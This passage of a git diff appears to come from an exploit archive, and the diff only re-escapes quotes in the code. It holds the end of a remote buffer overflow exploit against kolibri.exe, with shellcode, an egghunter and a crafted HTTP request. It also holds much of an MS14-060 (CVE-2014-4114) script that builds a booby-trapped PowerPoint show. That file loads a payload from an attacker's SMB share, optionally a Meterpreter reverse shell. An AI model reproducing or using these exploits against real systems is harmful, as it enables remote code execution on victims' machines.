+\"\\x63\\x58\\x6d\\x76\\x5a\\x35\\x6f\\x4d\\x6f\\x6d\\x69\\x6f\\x58\\x55\\x77\"
+\"\\x4c\\x63\\x36\\x33\\x4c\\x56\\x6a\\x6b\\x30\\x69\\x6b\\x4d\\x30\\x53\\x45\"
+\"\\x45\\x55\\x4f\\x4b\\x70\\x47\\x52\\x33\\x44\\x32\\x52\\x4f\\x51\\x7a\\x63\"
+\"\\x30\\x66\\x33\\x6b\\x4f\\x78\\x55\\x41\\x41\")
 
-#egghunter's tag : doge
-egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
-"\xef\xb8\x64\x6f\x67\x65\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
+#egghunter\'s tag : doge
+egghunter = (\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
+\"\\xef\\xb8\\x64\\x6f\\x67\\x65\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")
 
 if target == 1:
 	buff = 792
 elif target == 2:
 	buff = 794
 else:
-	print "Input Target option's number !"
+	print \"Input Target option\'s number !\"
 	exit()
 
-buffer = "\x90"*(buff-20-32-4)
+buffer = \"\\x90\"*(buff-20-32-4)
 buffer += egghunter
-buffer += "\x90"*20
-buffer += "\xEB\xBA\x90\x90"
-buffer += "\xC2\x15\x40"		#/p/p/r kolibri.exe
+buffer += \"\\x90\"*20
+buffer += \"\\xEB\\xBA\\x90\\x90\"
+buffer += \"\\xC2\\x15\\x40\"		#/p/p/r kolibri.exe
 
-eggshell = "dogedoge"+shellcode
+eggshell = \"dogedoge\"+shellcode
 
 evil = (
-"GET /"+buffer+" HTTP/1.1\r\n"
-"Host: "+eggshell+"\r\n"
-"User-Agent: kepo\r\n"
-"Connection: close\r\n\r\n")
+\"GET /\"+buffer+\" HTTP/1.1\\r\\n\"
+\"Host: \"+eggshell+\"\\r\\n\"
+\"User-Agent: kepo\\r\\n\"
+\"Connection: close\\r\\n\\r\\n\")
 
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
 	s.connect((rhost, port))
 except socket.error:
-	print "[!]Host down or unreachable !"
+	print \"[!]Host down or unreachable !\"
 	exit()
 s.send(evil)
 s.close()
 
-print "Exploit sended ! Wait a minute the egghunter may take a while to find the tag..."
+print \"Exploit sended ! Wait a minute the egghunter may take a while to find the tag...\"
diff --git a/platforms/windows/remote/35055.py b/platforms/windows/remote/35055.py
index 3d2ef06e4..bc84b911a 100755
--- a/platforms/windows/remote/35055.py
+++ b/platforms/windows/remote/35055.py
@@ -16,20 +16,20 @@ from pptx import Presentation
 # Args/Usage  
 def get_args():
  
-    parser = argparse.ArgumentParser( prog="ms14_060.py",
+    parser = argparse.ArgumentParser( prog=\"ms14_060.py\",
                                       formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
-                                      epilog= '''This script will build a blank PowerPoint show (ppsx) file to exploit the
+                                      epilog= \'\'\'This script will build a blank PowerPoint show (ppsx) file to exploit the
                                       OLE Remote Code Execution vulnerability identified as MS14-060 (CVE-2014-4114)
 				                          Simply pass filename of resulting PPSX and IP Address of remote machine hosting the
 				                          share. You can add content to the PPSX file after it has been created. 
                                       The script will also create the INF file and an optional Meterpreter
 				                          reverse_tcp executable with the -m switch. Alternatively, you can host your own exectuble payload. 
-                                      Host the INF and GIF (EXE) in an SMB share called "share".
-                                      Note: Requires python-pptx''')
+                                      Host the INF and GIF (EXE) in an SMB share called \"share\".
+                                      Note: Requires python-pptx\'\'\')
  
-    parser.add_argument("filename", help="Name of resulting PPSX exploit file")
-    parser.add_argument("ip", help="IP Address of Remote machine hosting the share")
-    parser.add_argument("-m", "--msf", help="Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)")
+    parser.add_argument(\"filename\", help=\"Name of resulting PPSX exploit file\")
+    parser.add_argument(\"ip\", help=\"IP Address of Remote machine hosting the share\")
+    parser.add_argument(\"-m\", \"--msf\", help=\"Set if you want to create Meterpreter gif executable. Pass port (uses ip arg)\")
     args = parser.parse_args()
  
     return args
@@ -37,104 +37,104 @@ def get_args():
  
 # write file
 def write_file(filename, contents):
-    f = open(filename, "w")
+    f = open(filename, \"w\")
     f.write(contents)
     f.close()
  
 # build bin
 def build_bin(embed, ip, share, file): 
  
-    bin = "\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # ole header
-    bin = bin + "\x00" * 16 
-    bin = bin + "\x3E\x00\x03\x00\xFE\xFF\x09\x00"
-    bin = bin + "\x06\x00\x00\x00\x00\x00\x00\x00"
-    bin = bin + "\x00\x00\x00\x00\x01\x00\x00\x00"
-    bin = bin + "\x01\x00\x00\x00\x00\x00\x00\x00"
-    bin = bin + "\x00\x10\x00\x00\x02\x00\x00\x00"
-    bin = bin + "\x01\x00\x00\x00\xFE\xFF\xFF\xFF"
-    bin = bin + "\x00\x00\x00\x00\x00\x00\x00\x00"
-    bin = bin + "\xFF" * 432
-    bin = bin + "\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
-    bin = bin + "\xFE\xFF\xFF\xFF\xFE\xFF\xFF\xFF"
-    bin = bin + "\xFF" * 496
-    bin = bin + "\x52\x00\x6F\x00\x6F\x00\x74\x00"
-    bin = bin + "\x20\x00\x45\x00\x6E\x00\x74\x00"
-    bin = bin + "\x72\x00\x79\x00\x00\x00\x00\x00"
-    bin = bin + "\x00" * 40
-    bin = bin + "\x16\x00\x05\x00\xFF\xFF\xFF\xFF"
-    bin = bin + "\xFF\xFF\xFF\xFF\x01\x00\x00\x00"
-    bin = bin + "\x02\x26\x02\x00\x00\x00\x00\x00"
-    bin = bin + "\xC0\x00\x00\x00\x00\x00\x00\x46"
-    bin = bin + "\x00" * 12
-    bin = bin + "\xF0\x75\xFD\x41\x63\xB2\xCF\x01"
-    bin = bin + "\x03\x00\x00\x00\x40\x00\x00\x00"
-    bin = bin + "\x00\x00\x00\x00\x01\x00\x4F\x00"
-    bin = bin + "\x4C\x00\x45\x00\x31\x00\x30\x00"
-    bin = bin + "\x4E\x00\x61\x00\x74\x00\x69\x00"
-    bin = bin + "\x76\x00\x65\x00\x00\x00\x00\x00"
-    bin = bin + "\x00" * 36
-    bin = bin + "\x1A\x00\x02\x01"
-    bin = bin + "\xFF" * 12
-    bin = bin + "\x00" * 40
-    bin = bin + "\x37"
-    bin = bin + "\x00" * 75
-    bin = bin + "\xFF" * 12
-    bin = bin + "\x00" * 116
-    bin = bin + "\xFF" * 12
-    bin = bin + "\x00" * 48
-    bin = bin + "\xFE"
-    bin = bin + "\xFF" * 511
-    bin = bin + "\x33\x00\x00\x00" + embed + "\x00" # 3   EmbeddedStgX.txt 
-    bin = bin + "\x5C\x5C" + ip + "\x5C" + share + "\x5C" + file # \\ip\share\file    
-    bin = bin + "\x00" * 460
+    bin = \"\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1\" # ole header
+    bin = bin + \"\\x00\" * 16 
+    bin = bin + \"\\x3E\\x00\\x03\\x00\\xFE\\xFF\\x09\\x00\"
+    bin = bin + \"\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\"
+    bin = bin + \"\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\x00\\x10\\x00\\x00\\x02\\x00\\x00\\x00\"
+    bin = bin + \"\\x01\\x00\\x00\\x00\\xFE\\xFF\\xFF\\xFF\"
+    bin = bin + \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\xFF\" * 432
+    bin = bin + \"\\xFD\\xFF\\xFF\\xFF\\xFE\\xFF\\xFF\\xFF\"
+    bin = bin + \"\\xFE\\xFF\\xFF\\xFF\\xFE\\xFF\\xFF\\xFF\"
+    bin = bin + \"\\xFF\" * 496
+    bin = bin + \"\\x52\\x00\\x6F\\x00\\x6F\\x00\\x74\\x00\"
+    bin = bin + \"\\x20\\x00\\x45\\x00\\x6E\\x00\\x74\\x00\"
+    bin = bin + \"\\x72\\x00\\x79\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\x00\" * 40
+    bin = bin + \"\\x16\\x00\\x05\\x00\\xFF\\xFF\\xFF\\xFF\"
+    bin = bin + \"\\xFF\\xFF\\xFF\\xFF\\x01\\x00\\x00\\x00\"
+    bin = bin + \"\\x02\\x26\\x02\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\xC0\\x00\\x00\\x00\\x00\\x00\\x00\\x46\"
+    bin = bin + \"\\x00\" * 12
+    bin = bin + \"\\xF0\\x75\\xFD\\x41\\x63\\xB2\\xCF\\x01\"
+    bin = bin + \"\\x03\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"
+    bin = bin + \"\\x00\\x00\\x00\\x00\\x01\\x00\\x4F\\x00\"
+    bin = bin + \"\\x4C\\x00\\x45\\x00\\x31\\x00\\x30\\x00\"
+    bin = bin + \"\\x4E\\x00\\x61\\x00\\x74\\x00\\x69\\x00\"
+    bin = bin + \"\\x76\\x00\\x65\\x00\\x00\\x00\\x00\\x00\"
+    bin = bin + \"\\x00\" * 36
+    bin = bin + \"\\x1A\\x00\\x02\\x01\"
+    bin = bin + \"\\xFF\" * 12
+    bin = bin + \"\\x00\" * 40
+    bin = bin + \"\\x37\"
+    bin = bin + \"\\x00\" * 75
+    bin = bin + \"\\xFF\" * 12
+    bin = bin + \"\\x00\" * 116
+    bin = bin + \"\\xFF\" * 12
+    bin = bin + \"\\x00\" * 48
+    bin = bin + \"\\xFE\"
+    bin = bin + \"\\xFF\" * 511
+    bin = bin + \"\\x33\\x00\\x00\\x00\" + embed + \"\\x00\" # 3   EmbeddedStgX.txt 
+    bin = bin + \"\\x5C\\x5C\" + ip + \"\\x5C\" + share + \"\\x5C\" + file # \\\\ip\\share\\file    
+    bin = bin + \"\\x00\" * 460
     return bin
 
 # build ppt/drawings/vmlDrawing1.vml	
 def build_vml():
-    xml = '<xml xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:p="urn:schemas-microsoft-com:office:powerpoint" xmlns:oa="urn:schemas-microsoft-com:office:activation">'
-    xml = xml + '<o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout><v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">'
-    xml = xml + '<v:stroke joinstyle="miter"/><v:formulas><v:f eqn="if lineDrawn pixelLineWidth 0"/><v:f eqn="sum @0 1 0"/><v:f eqn="sum 0 0 @1"/><v:f eqn="prod @2 1 2"/><v:f eqn="prod @3 21600 pixelWidth"/><v:f eqn="prod @3 21600 pixelHeight"/><v:f eqn="sum @0 0 1"/>'
-    xml = xml + '<v:f eqn="prod @6 1 2"/><v:f eqn="prod @7 21600 pixelWidth"/><v:f eqn="sum @8 21600 0"/><v:f eqn="prod @7 21600 pixelHeight"/><v:f eqn="sum @10 21600 0"/></v:formulas>'
-    xml = xml + '<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/><o:lock v:ext="edit" aspectratio="t"/></v:shapetype><v:shape id="_x0000_s1026" type="#_x0000_t75" style="position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt"><v:imagedata o:relid="rId1" o:title=""/></v:shape><v:shape id="_x0000_s1027" type="#_x0000_t75" style="position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt">'
-    xml = xml + '<v:imagedata o:relid="rId2" o:title=""/></v:shape></xml>'
+    xml = \'<xml xmlns:v=\"urn:schemas-microsoft-com:vml\" xmlns:o=\"urn:schemas-microsoft-com:office:office\" xmlns:p=\"urn:schemas-microsoft-com:office:powerpoint\" xmlns:oa=\"urn:schemas-microsoft-com:office:activation\">\'
+    xml = xml + \'<o:shapelayout v:ext=\"edit\"><o:idmap v:ext=\"edit\" data=\"1\"/></o:shapelayout><v:shapetype id=\"_x0000_t75\" coordsize=\"21600,21600\" o:spt=\"75\" o:preferrelative=\"t\" path=\"m@4@5l@4@11@9@11@9@5xe\" filled=\"f\" stroked=\"f\">\'
+    xml = xml + \'<v:stroke joinstyle=\"miter\"/><v:formulas><v:f eqn=\"if lineDrawn pixelLineWidth 0\"/><v:f eqn=\"sum @0 1 0\"/><v:f eqn=\"sum 0 0 @1\"/><v:f eqn=\"prod @2 1 2\"/><v:f eqn=\"prod @3 21600 pixelWidth\"/><v:f eqn=\"prod @3 21600 pixelHeight\"/><v:f eqn=\"sum @0 0 1\"/>\'
+    xml = xml + \'<v:f eqn=\"prod @6 1 2\"/><v:f eqn=\"prod @7 21600 pixelWidth\"/><v:f eqn=\"sum @8 21600 0\"/><v:f eqn=\"prod @7 21600 pixelHeight\"/><v:f eqn=\"sum @10 21600 0\"/></v:formulas>\'
+    xml = xml + \'<v:path o:extrusionok=\"f\" gradientshapeok=\"t\" o:connecttype=\"rect\"/><o:lock v:ext=\"edit\" aspectratio=\"t\"/></v:shapetype><v:shape id=\"_x0000_s1026\" type=\"#_x0000_t75\" style=\"position:absolute; left:100pt;top:-100pt;width:30pt;height:30pt\"><v:imagedata o:relid=\"rId1\" o:title=\"\"/></v:shape><v:shape id=\"_x0000_s1027\" type=\"#_x0000_t75\" style=\"position:absolute; left:150pt;top:-100pt;width:30pt;height:30pt\">\'
+    xml = xml + \'<v:imagedata o:relid=\"rId2\" o:title=\"\"/></v:shape></xml>\'
     return xml
  
  # build ppt/slides/_rels/slide1.xml.rels
 def build_xml_rels(ole1, ole2):
-    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
-    xml = xml + '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole1 + '"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/' + ole2 + '"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing" Target="../drawings/vmlDrawing1.vml"/></Relationships>'  
+    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
+    xml = xml + \'<Relationships xmlns=\"http://schemas.openxmlformats.org/package/2006/relationships\"><Relationship Id=\"rId3\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"../embeddings/\' + ole1 + \'\"/><Relationship Id=\"rId4\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" Target=\"../embeddings/\' + ole2 + \'\"/><Relationship Id=\"rId2\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout\" Target=\"../slideLayouts/slideLayout1.xml\"/><Relationship Id=\"rId1\" Type=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/vmlDrawing\" Target=\"../drawings/vmlDrawing1.vml\"/></Relationships>\'  
     return xml
  
 def build_xml_slide1():
-    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
-    xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
+    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
+    xml = xml + \'<p:sld xmlns:a=\"http://schemas.openxmlformats.org/drawingml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\" xmlns:p=\"http://schemas.openxmlformats.org/presentationml/2006/main\"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id=\"1\" name=\"\"/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x=\"0\" y=\"0\"/><a:ext cx=\"0\" cy=\"0\"/><a:chOff x=\"0\" y=\"0\"/><a:chExt cx=\"0\" cy=\"0\"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id=\"4\" name=\"Object 3\"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect=\"1\"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x=\"1270000\" y=\"-1270000\"/><a:ext cx=\"381000\" cy=\"381000\"/></p:xfrm><a:graphic><a:graphicData uri=\"http://schemas.openxmlformats.org/presentationml/2006/ole\"><p:oleObj spid=\"_x0000_s1026\" name=\"Packager Shell Object\" r:id=\"rId3\" imgW=\"850320\" imgH=\"686880\" progId=\"\"><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id=\"5\" name=\"Object 4\"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect=\"1\"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x=\"1905000\" y=\"-1270000\"/><a:ext cx=\"381000\" cy=\"381000\"/></p:xfrm><a:graphic><a:graphicData uri=\"http://schemas.openxmlformats.org/presentationml/2006/ole\"><p:oleObj spid=\"_x0000_s1027\" name=\"Packager Shell Object\" r:id=\"rId4\" imgW=\"850320\" imgH=\"686880\" progId=\"\"><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id=\"1\" dur=\"indefinite\" restart=\"never\" nodeType=\"tmRoot\"><p:childTnLst><p:seq concurrent=\"1\" nextAc=\"seek\"><p:cTn id=\"2\" dur=\"indefinite\" nodeType=\"mainSeq\"><p:childTnLst><p:par><p:cTn id=\"3\" fill=\"hold\"><p:stCondLst><p:cond delay=\"indefinite\"/><p:cond evt=\"onBegin\" delay=\"0\"><p:tn val=\"2\"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"4\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"5\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"withEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"6\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id=\"7\" fill=\"hold\"><p:stCondLst><p:cond delay=\"1000\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"8\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"afterEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"9\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set><p:cmd type=\"verb\" cmd=\"-3\"><p:cBhvr><p:cTn id=\"10\" dur=\"1000\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id=\"11\" fill=\"hold\"><p:stCondLst><p:cond delay=\"2000\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"12\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"afterEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"13\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"5\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set><p:cmd type=\"verb\" cmd=\"3\"><p:cBhvr><p:cTn id=\"14\" dur=\"1000\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"5\"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt=\"onPrev\" delay=\"0\"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt=\"onNext\" delay=\"0\"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>\'
     return xml
 
 # build [Content_Types].xml	
 def build_xml_content_types():
-    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
-    xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" 